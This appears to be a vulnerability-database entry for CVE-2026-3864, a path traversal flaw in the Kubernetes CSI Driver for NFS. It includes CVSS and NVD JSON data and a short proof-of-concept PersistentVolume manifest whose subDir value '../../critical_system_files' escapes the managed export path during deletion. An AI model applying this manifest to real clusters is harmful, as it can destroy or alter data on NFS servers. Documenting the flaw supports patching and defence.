Security Vulnerability Report
中文
CVE-2026-3864 CVSS 6.5 MEDIUM

CVE-2026-3864

Published: 2026-03-20 23:16:48
Last Modified: 2026-03-23 14:32:03
Source: [email protected]

Description

A vulnerability was discovered in the Kubernetes CSI Driver for NFS where the subDir parameter in volume identifiers was insufficiently validated. Attackers with the ability to create PersistentVolumes referencing the NFS CSI driver could craft volume identifiers containing path traversal sequences (../). During volume deletion or cleanup operations, the driver could operate on unintended directories outside the intended managed path within the NFS export. This may lead to deletion or modification of directories on the NFS server.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Kubernetes CSI Driver for NFS

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
apiVersion: v1 kind: PersistentVolume metadata: name: nfs-exploit-pv spec: capacity: storage: 5Gi accessModes: - ReadWriteMany persistentVolumeReclaimPolicy: Delete csi: driver: nfs.csi.k8s.io volumeHandle: vol-exploit-01 volumeAttributes: server: 192.168.1.10 share: /export/data # Malicious subDir using path traversal to target parent or root subDir: "../../critical_system_files"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3864", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:48.303", "lastModified": "2026-03-23T14:32:02.800", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was discovered in the Kubernetes CSI Driver for NFS where the subDir parameter in volume identifiers was insufficiently validated. Attackers with the ability to create PersistentVolumes referencing the NFS CSI driver could craft volume identifiers containing path traversal sequences (../). During volume deletion or cleanup operations, the driver could operate on unintended directories outside the intended managed path within the NFS export. This may lead to deletion or modification of directories on the NFS server."}, {"lang": "es", "value": "Se descubrió una vulnerabilidad en el controlador CSI de Kubernetes para NFS donde el parámetro subDir en los identificadores de volumen no se validaba suficientemente. Atacantes con la capacidad de crear PersistentVolumes que hacen referencia al controlador CSI de NFS podrían crear identificadores de volumen que contienen secuencias de salto de ruta (../). Durante las operaciones de eliminación o limpieza de volumen, el controlador podría operar en directorios no deseados fuera de la ruta gestionada prevista dentro de la exportación NFS. Esto podría llevar a la eliminación o modificación de directorios en el servidor NFS."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/kubernetes/kubernetes/issues/137797", "source": "[email protected]"}, {"url": "https://groups.google.com/g/kubernetes-security-announce/c/i4ZKN9VLcUE", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/17/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.